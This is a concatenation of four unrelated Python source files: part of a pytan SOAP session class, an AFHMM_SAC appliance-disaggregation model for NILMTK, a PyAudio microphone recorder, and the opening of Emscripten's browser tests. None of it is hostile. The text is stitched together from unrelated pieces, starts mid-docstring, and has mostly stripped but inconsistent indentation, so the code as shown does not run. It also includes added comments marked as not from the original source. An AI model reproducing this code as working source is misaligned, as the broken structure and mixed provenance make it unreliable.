body : str
* XML to search
element : str
* element name to search for in body
fail : bool, optional
* default: True
* True: throw exception if unable to find any matches for `regex` in `body`
* False: do not throw exception if unable to find any matches for `regex` in `body`
Returns
-------
ret : str
* The first capture group matched by the regex built from ELEMENT_RE_TXT and `element`
Notes
-----
* Using a regex is WAY faster than having ElementTree chew the body in and out; this matters a LOT on LARGE return bodies
"""
regex_txt = self.ELEMENT_RE_TXT.format(element)
regex = re.compile(regex_txt, re.IGNORECASE | re.DOTALL)
ret = regex.search(body)
if not ret and fail:
m = "Unable to find {} in body: {}".format
raise Exception(m(regex.pattern, body))
else:
ret = str(ret.groups()[0].strip()) if ret else ''  # guard against no match when fail=False
m = "Value of element '{}': '{}' (using pattern: '{}'".format
self.mylog.debug(m(element, ret, regex.pattern))
return ret
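# Standalone illustration (not from the original source) of the extraction
# pattern, assuming ELEMENT_RE_TXT is a format string along the lines of
# r'<{0}>(.*?)</{0}>':
#   import re
#   body = '<session>1-234-abcdef</session>'
#   re.search(r'<{0}>(.*?)</{0}>'.format('session'), body, re.I | re.S).group(1)
#   # -> '1-234-abcdef'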
def _extract_resultxml(self, response_body):
"""Utility method to get the 'ResultXML' element from an XML body.
Parameters
----------
response_body : str
* XML body to search for the 'ResultXML' element in
Returns
-------
ret : str
* text of the 'ResultXML' element found in the XML response
"""
el = ET.fromstring(response_body)
# find the ResultXML node
resultxml_el = el.find('.//ResultXML')
if resultxml_el is None:
m = "Unable to find ResultXML element in XML response: {}".format
raise pytan.exceptions.AuthorizationError(m(response_body))
resultxml_text = resultxml_el.text
if not resultxml_text:
m = "Empty ResultXML element in XML response: {}".format
raise pytan.exceptions.AuthorizationError(m(response_body))
return resultxml_text
def _get_response(self, request_body, **kwargs):
"""A wrapper around :func:`pytan.sessions.Session.http_post` for SOAP XML requests and responses.
This method will update self.session_id if the response contains a different session_id than what is currently in this object.
Parameters
----------
request_body : str
* the XML request body to send to the server
connect_timeout: int, optional
* default: self.SOAP_CONNECT_TIMEOUT_SEC
* timeout in seconds for connection to host
response_timeout: int, optional
* default: self.SOAP_RESPONSE_TIMEOUT_SEC
* timeout in seconds for response from host
retry_auth: bool, optional
* default: True
* True: retry authentication with username/password if session_id fails
* False: throw exception if session_id fails
retry_count: int, optional
* number of times to retry the request if the server fails to respond properly or in time
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
Returns
-------
body : str
* str containing body of response from server
See Also
--------
:func:`pytan.sessions.Session.http_post` : wrapper method used to perform the HTTP POST
"""
retry_auth = kwargs.get('retry_auth', True)
self._check_auth()
self.LAST_RESPONSE_INFO = {}
request_command = self._regex_body_for_element(
body=request_body, element='command', fail=True,
)
self.LAST_RESPONSE_INFO['request_command'] = request_command
req_args = {}
req_args['body'] = request_body
req_args['headers'] = dict(self.SOAP_REQUEST_HEADERS)
req_args['connect_timeout'] = kwargs.get('connect_timeout', self.SOAP_CONNECT_TIMEOUT_SEC)
req_args['response_timeout'] = kwargs.get(
'response_timeout', self.SOAP_RESPONSE_TIMEOUT_SEC
)
req_args['pytan_help'] = kwargs.get('pytan_help', '')
if 'retry_count' in kwargs:
req_args['retry_count'] = kwargs['retry_count']
self.LAST_RESPONSE_INFO['request_args'] = req_args
sent = datetime.utcnow()
self.LAST_RESPONSE_INFO['sent'] = sent
response_body = self.http_post(**req_args)
received = datetime.utcnow()
self.LAST_RESPONSE_INFO['received'] = received
elapsed = received - sent
self.LAST_RESPONSE_INFO['elapsed'] = elapsed
# m = "HTTP Response: Timing info -- SENT: {}, RECEIVED: {}, ELAPSED: {}".format
# self.mylog.debug(m(sent, received, elapsed))
response_command = self._regex_body_for_element(
body=response_body, element='command', fail=True,
)
self.LAST_RESPONSE_INFO['response_command'] = response_command
if 'forbidden' in response_command.lower():
if retry_auth:
m = "Last request was denied, re-authenticating with user/pass".format
self.authlog.debug(m())
# we may have hit the 5 minute expiration for session_id, empty out session ID,
# re-authenticate, then retry request
self._session_id = ''
self.authenticate(**kwargs)
# re-issue the request
kwargs['retry_auth'] = False
response_body = self._get_response(request_body=request_body, **kwargs)
else:
m = "Access denied after re-authenticating! Server response: {}".format
raise pytan.exceptions.AuthorizationError(m(response_command))
elif response_command != request_command:
    for p in self.BAD_RESPONSE_CMD_PRUNES:
        response_command = response_command.replace(p, '').strip()
    # only raise if the commands still differ after pruning the known noise strings
    if response_command != request_command:
        m = "Response command {} does not match request command {}".format
        raise pytan.exceptions.BadResponseError(m(response_command, request_command))
# update session_id, in case new one issued
self.session_id = self._regex_body_for_element(
body=response_body, element='session', fail=True,
)
# check to see if server_version set in response (6.5+ only)
if self._invalid_server_version():
server_version = self._regex_body_for_element(
body=response_body, element='server_version', fail=False,
)
if server_version and self.server_version != server_version:
self.server_version = server_version
return response_body
def _invalid_server_version(self):
"""Utility method to find out if self.server_version is valid or not."""
current_server_version = getattr(self, 'server_version', '')
if current_server_version in self.BAD_SERVER_VERSIONS:
return True
return False
|
afhmm_sac.py
|
from __future__ import print_function, division
from warnings import warn
import pandas as pd
import numpy as np
from nilmtk.disaggregate import Disaggregator
from hmmlearn import hmm
from collections import OrderedDict
import cvxpy as cvx
from collections import Counter
import matplotlib.pyplot as plt
import time
from sklearn.metrics import mean_squared_error,mean_absolute_error
import math
from multiprocessing import Process, Manager
class AFHMM_SAC(Disaggregator):
"""1 dimensional baseline Mean algorithm.
"""
def __init__(self, params):
self.model = []
self.MIN_CHUNK_LENGTH = 100
self.MODEL_NAME = 'AFHMM_SAC'
self.default_num_states = 2
self.models = []
self.num_appliances = 0
self.appliances = []
self.time_period = 720
self.signal_aggregates = OrderedDict()
self.time_period = params.get('time_period', self.time_period)
self.default_num_states = params.get('default_num_states',2)
self.save_model_path = params.get('save-model-path', None)
self.load_model_path = params.get('pretrained-model-path',None)
self.chunk_wise_training = False
if self.load_model_path:
self.load_model(self.load_model_path)
def partial_fit(self, train_main, train_appliances, **load_kwargs):
self.models = []
self.num_appliances = 0
self.appliances = []
'''
train_main :- pd.DataFrame It will contain the mains reading.
train_appliances :- list of tuples [('appliance1',df1),('appliance2',df2),...]
'''
train_main = pd.concat(train_main, axis=0)
train_app_tmp = []
for app_name, df_list in train_appliances:
df_list = pd.concat(df_list, axis=0)
train_app_tmp.append((app_name,df_list))
train_appliances = train_app_tmp
learnt_model = OrderedDict()
means_vector = []
one_hot_states_vector = []
pi_s_vector = []
transmat_vector = []
states_vector = []
train_main = train_main.values.flatten().reshape((-1,1))
for appliance_name, power in train_appliances:
#print (appliance_name)
self.appliances.append(appliance_name)
X = power.values.reshape((-1,1))
learnt_model[appliance_name] = hmm.GaussianHMM(self.default_num_states, "full")
# Fit
learnt_model[appliance_name].fit(X)
means = learnt_model[appliance_name].means_.flatten().reshape((-1,1))
states = learnt_model[appliance_name].predict(X)
transmat = learnt_model[appliance_name].transmat_
counter = Counter(states.flatten())
total = 0
keys = list(counter.keys())
keys.sort()
for i in keys:
total+=counter[i]
pi = []
for i in keys:
pi.append(counter[i]/total)
pi = np.array(pi)
nb_classes = self.default_num_states
targets = states.reshape(-1)
means_vector.append(means)
pi_s_vector.append(pi)
transmat_vector.append(transmat.T)
states_vector.append(states)
self.num_appliances+=1
self.signal_aggregates[appliance_name] = (np.mean(X)*self.time_period).reshape((-1,))
self.means_vector = means_vector
self.pi_s_vector = pi_s_vector
self.transmat_vector = transmat_vector
# print(transmat_vector)
# print (means_vector)
# print (states_vector)
# print (pi_s_vector)
print ("Finished Training")
# print (self.signal_aggregates)
# print (np.log(transmat))
# print(pi)
# print (np.log(pi))
#print (np.sum(transmat_vector[0],axis=1))
#print (np.sum(transmat_vector[0],axis=0))
#print (states.shape)
#print (one_hot_targets.shape)
# one_hot_states_vector = np.array(one_hot_states_vector)
# # print (transmat_vector[0])
# # print (np.sum(transmat_vector[0],axis=0))
# # print (np.sum(transmat_vector[0],axis=1))
# appliance_variable_matrix = []
# #print (len(states_vector))
# #variable_matrix = np.zeros((len(appliance_states),self.default_num_states,self.default_num_states))
# for appliance_states in states_vector:
# variable_matrix = np.zeros((len(appliance_states),self.default_num_states,self.default_num_states))
# for i in range(1,len(appliance_states)):
# current_state = appliance_states[i]
# previous_state = appliance_states[i-1]
# variable_matrix[i,current_state, previous_state] = 1
# appliance_variable_matrix.append(variable_matrix)
# appliance_variable_matrix = np.array(appliance_variable_matrix)
# term_1_list = []
# term_2_list = []
def disaggregate_thread(self, test_mains,index,d):
means_vector = self.means_vector
pi_s_vector = self.pi_s_vector
transmat_vector = self.transmat_vector
sigma = 100*np.ones((len(test_mains),1))
flag = 0
for epoch in range(6):
if epoch%2==1:
# The alternating minimization step: re-estimate the noise scale sigma from the current state estimates
usage = np.zeros((len(test_mains)))
for appliance_id in range(self.num_appliances):
app_usage= np.sum(s_[appliance_id]@means_vector[appliance_id],axis=1)
usage+=app_usage
sigma = (test_mains.flatten() - usage.flatten()).reshape((-1,1))
sigma = np.where(sigma<1,1,sigma)
else:
if flag==0:
constraints = []
cvx_state_vectors = []
cvx_variable_matrices = []
delta = cvx.Variable(shape=(len(test_mains),1), name='delta_t')
for appliance_id in range(self.num_appliances):
state_vector = cvx.Variable(shape=(len(test_mains), self.default_num_states), name='state_vec-%s'%(appliance_id))
cvx_state_vectors.append(state_vector)
# Enforcing that their values are ranged
constraints+=[cvx_state_vectors[appliance_id]>=0]
constraints+=[cvx_state_vectors[appliance_id]<=1]
# Enforcing that sum of states equals 1
for t in range(len(test_mains)): # 6c
constraints+=[cvx.sum(cvx_state_vectors[appliance_id][t])==1]
# Creating Variable matrices for every appliance
appliance_variable_matrix = []
for t in range(len(test_mains)):
matrix = cvx.Variable(shape=(self.default_num_states, self.default_num_states), name='variable_matrix-%s-%d'%(appliance_id,t))
appliance_variable_matrix.append(matrix)
cvx_variable_matrices.append(appliance_variable_matrix)
# Enforcing that their values are ranged
for t in range(len(test_mains)):
constraints+=[cvx_variable_matrices[appliance_id][t]>=0]
constraints+=[cvx_variable_matrices[appliance_id][t]<=1]
# Constraint 6e
for t in range(0,len(test_mains)): # 6e
for i in range(self.default_num_states):
constraints+=[cvx.sum(((cvx_variable_matrices[appliance_id][t]).T)[i]) == cvx_state_vectors[appliance_id][t][i]]
# Constraint 6d
for t in range(1,len(test_mains)): # 6d
for i in range(self.default_num_states):
constraints+=[cvx.sum(cvx_variable_matrices[appliance_id][t][i]) == cvx_state_vectors[appliance_id][t-1][i]]
for appliance_id in range(self.num_appliances):
appliance_usage = cvx_state_vectors[appliance_id]@means_vector[appliance_id]
total_appliance_usage = cvx.sum(appliance_usage)
constraints+=[total_appliance_usage <= self.signal_aggregates[self.appliances[appliance_id]]]
# Second order cone constraints
total_observed_reading = np.zeros((test_mains.shape))
#print (len(cvx_state_vectors))
for appliance_id in range(self.num_appliances):
total_observed_reading+=cvx_state_vectors[appliance_id]@means_vector[appliance_id]
flag=1
term_1 = 0
term_2 = 0
for appliance_id in range(self.num_appliances):
# First loop is over appliances
variable_matrix = cvx_variable_matrices[appliance_id]
transmat = transmat_vector[appliance_id]
# Next loop is over different time-stamps
for matrix in variable_matrix:
term_1-=cvx.sum(cvx.multiply(matrix,np.log(transmat)))
one_hot_states = cvx_state_vectors[appliance_id]
pi = pi_s_vector[appliance_id]
# The expression involving start states
first_one_hot_states = one_hot_states[0]
term_2-= cvx.sum(cvx.multiply(first_one_hot_states,np.log(pi)))
flag = 1
expression = 0
term_3 = 0
term_4 = 0
for t in range(len(test_mains)):
term_4+= .5 * ((test_mains[t][0] - total_observed_reading[t][0])**2 / (sigma[t]**2))
term_3+= .5 * (np.log(sigma[t]**2))
expression = term_1 + term_2 + term_3 + term_4
expression = cvx.Minimize(expression)
u = time.time()
prob = cvx.Problem(expression, constraints)
prob.solve(solver=cvx.SCS,verbose=False, warm_start=True)
s_ = [i.value for i in cvx_state_vectors]
prediction_dict = {}
for appliance_id in range(self.num_appliances):
app_name = self.appliances[appliance_id]
app_usage= np.sum(s_[appliance_id]@means_vector[appliance_id],axis=1)
prediction_dict[app_name] = app_usage.flatten()
d[index] = pd.DataFrame(prediction_dict,dtype='float32')
def disaggregate_chunk(self, test_mains_list):
# Distributes the test mains across multiple processes and runs them in parallel
manager = Manager()
d = manager.dict()
predictions_lst = []
for test_mains in test_mains_list:
test_mains_big = test_mains.values.flatten().reshape((-1,1))
self.arr_of_results = []
st = time.time()
threads = []
for test_block in range(int(math.ceil(len(test_mains_big)/self.time_period))):
test_mains = test_mains_big[test_block*(self.time_period):(test_block+1)*self.time_period]
t = Process(target=self.disaggregate_thread, args=(test_mains,test_block,d))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for i in range(len(threads)):
self.arr_of_results.append(d[i])
prediction = pd.concat(self.arr_of_results,axis=0)
predictions_lst.append(prediction)
return predictions_lst
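# Minimal synthetic smoke test -- an illustrative sketch only. In normal use the
# NILMTK API builds these DataFrames; the appliance names, power levels,
# time_period and state count below are assumptions for demonstration, and the
# convex solve may take a little while even for this small example.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    n = 120
    # two synthetic two-state appliances and their aggregate mains signal
    fridge = pd.DataFrame(rng.choice([0.0, 100.0], size=n))
    heater = pd.DataFrame(rng.choice([0.0, 200.0], size=n))
    mains = fridge + heater
    model = AFHMM_SAC({'time_period': n, 'default_num_states': 2})
    model.partial_fit([mains], [('fridge', [fridge]), ('heater', [heater])])
    predictions = model.disaggregate_chunk([mains])
    print(predictions[0].head())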
|
recorder.py
|
import matplotlib
matplotlib.use('TkAgg') # THIS MAKES IT FAST!
import numpy
import scipy
import struct
import pyaudio
import threading
import pylab
class SwhRecorder:
"""Simple, cross-platform class to record from the microphone."""
def __init__(self):
"""minimal garb is executed when class is loaded."""
self.RATE=48100
self.BUFFERSIZE=2**12 #1024 is a good buffer size
self.secToRecord=.1
self.threadsDieNow=False
self.newAudio=False
def setup(self):
"""initialize sound card."""
#TODO - windows detection vs. alsa or something for linux
#TODO - try/except for sound card selection/initiation
self.buffersToRecord=int(self.RATE*self.secToRecord/self.BUFFERSIZE)
if self.buffersToRecord==0: self.buffersToRecord=1
self.samplesToRecord=int(self.BUFFERSIZE*self.buffersToRecord)
self.chunksToRecord=int(self.samplesToRecord/self.BUFFERSIZE)
self.secPerPoint=1.0/self.RATE
self.p = pyaudio.PyAudio()
self.inStream = self.p.open(format=pyaudio.paInt16,channels=1,
rate=self.RATE,input=True,frames_per_buffer=self.BUFFERSIZE)
self.xsBuffer=numpy.arange(self.BUFFERSIZE)*self.secPerPoint
self.xs=numpy.arange(self.chunksToRecord*self.BUFFERSIZE)*self.secPerPoint
self.audio=numpy.empty((self.chunksToRecord*self.BUFFERSIZE),dtype=numpy.int16)
def close(self):
"""cleanly back out and release sound card."""
self.p.close(self.inStream)
### RECORDING AUDIO ###
def getAudio(self):
"""get a single buffer size worth of audio."""
audioString=self.inStream.read(self.BUFFERSIZE)
return numpy.frombuffer(audioString,dtype=numpy.int16)  # fromstring is deprecated for binary data
def record(self,forever=True):
"""record secToRecord seconds of audio."""
while True:
if self.threadsDieNow: break
for i in range(self.chunksToRecord):
self.audio[i*self.BUFFERSIZE:(i+1)*self.BUFFERSIZE]=self.getAudio()
self.newAudio=True
if forever==False: break
def continuousStart(self):
"""CALL THIS to start running forever."""
self.t = threading.Thread(target=self.record)
self.t.start()
def continuousEnd(self):
"""shut down continuous recording."""
self.threadsDieNow=True
### MATH ###
def downsample(self,data,mult):
"""Given 1D data, return the binned average."""
overhang=len(data)%mult
if overhang: data=data[:-overhang]
data=numpy.reshape(data,(len(data)//mult,mult))  # integer division; a float shape fails under Python 3
data=numpy.average(data,1)
return data
def fft(self,data=None,trimBy=10,logScale=False,divBy=100):
if data is None:
data=self.audio.flatten()
left,right=numpy.split(numpy.abs(numpy.fft.fft(data)),2)
ys=numpy.add(left,right[::-1])
if logScale:
ys=numpy.multiply(20,numpy.log10(ys))
xs=numpy.arange(self.BUFFERSIZE/2,dtype=float)
if trimBy:
i=int((self.BUFFERSIZE/2)/trimBy)
ys=ys[:i]
xs=xs[:i]*self.RATE/self.BUFFERSIZE
if divBy:
ys=ys/float(divBy)
return xs,ys
### VISUALIZATION ###
def plotAudio(self):
"""open a matplotlib popup window showing audio data."""
pylab.plot(self.audio.flatten())
pylab.show()
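# Illustrative usage sketch (not part of the original module; assumes a working
# microphone and PyAudio install): record one pass of audio and report the
# strongest frequency bin from the FFT helper above.
if __name__ == "__main__":
    rec = SwhRecorder()
    rec.setup()
    for i in range(rec.chunksToRecord):
        rec.audio[i * rec.BUFFERSIZE:(i + 1) * rec.BUFFERSIZE] = rec.getAudio()
    xs, ys = rec.fft()
    print("strongest bin: %.1f Hz" % xs[ys.argmax()])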
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_test_file, parameterized, ensure_dir, disabled
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
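# Illustrative note (an assumption, not shown in this excerpt): this helper is
# intended to be launched in a separate process by the chunked synchronous XHR
# browser test, roughly:
#   multiprocessing.Process(target=test_chunked_synchronous_xhr_server,
#                           args=(True, chunk_size, data, checksum, port)).start()
# so that it can serve the byte-range requests while the browser test runs.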
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend, so any test that was disabled under the llvm
# backend is now always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix or remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future; remove this test once
# system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp'), 0,
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = path_from_root('tests/manual_download_data.cpp')
create_test_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that output files with single or double quotes in their names are handled by correctly escaping the names.
